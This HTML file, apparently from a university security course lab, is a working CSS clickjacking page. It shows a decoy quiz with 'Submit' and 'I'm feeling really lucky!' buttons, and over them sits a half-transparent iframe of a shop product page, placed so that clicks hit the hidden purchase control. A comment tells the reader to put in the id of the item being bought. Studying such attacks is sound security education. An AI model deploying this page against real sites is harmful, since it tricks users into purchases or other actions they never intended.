<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>CSS Clickjacking</title>
    <style>
    body{ font:"1em verdana"; margin: 50px;}
    ul{margin: 0; padding: 0;}
    ul li {margin: 2px; position: relative; padding: 2px 0;  list-style: none;}
    ul#ulLike {display: inline; margin: 0 5px;}
    ul#ulLike li{float: left; list-style:none; padding: 2px 0;}

    .clickJackFrame {
      position:absolute;
      overflow: hidden;
      top:-355px; 
      left:35px;
      width:110px;
      height:650px;
      opacity:.5;
      filter: alpha(opacity=.5);
    }

    input {margin: 0px px;}
    #btnSubmit {width:65px;}



    </style>
</head>
<body>
  <!-- vvvvvv don't modify below the comment vvvvv -->
    <form id="clickJackForm">
        <div>
            <h3>Did you hear that click, Jack?</h3>
            <ul>
                <li>
                    <input id="opt1" type="radio" name="q1" value="1" /><label for="opt1">Fantastic</label></li>
                <li>
                    <input id="opt2" type="radio" name="q1" value="1" /><label for="opt2">Mind Blowing</label></li>
                <li>
                    <input id="opt3" type="radio" name="q1" value="1" /><label for="opt3">Unbelievable</label></li>
                <li>
                    <input id="opt4" type="radio" disabled="disabled" name="q1" value="1" /><label for="opt4">I'm
                        not sure</label></li>
            </ul>
            <div>
                <input id="btnSubmit" type="submit" value="Submit" />
                <input type="submit" id="btnToggle" value="I'm feeling really lucky!" />
            </div>
        </div>
          <!--^^^^^^ don't modify above  this comment^^^^^^ -->

          <!-- modify the frame id below by the id of item you are buying -->
        <iframe id="attackingFrame" src="http://gtshop.com/products/detail?id=6" scrolling="no" class="clickJackFrame">
        </iframe>
    </form>
    <script src="http://www.prism.gatech.edu/~gwang312/jquery-1.6.4.min.js" type="text/javascript"></script>
</body>
</html>
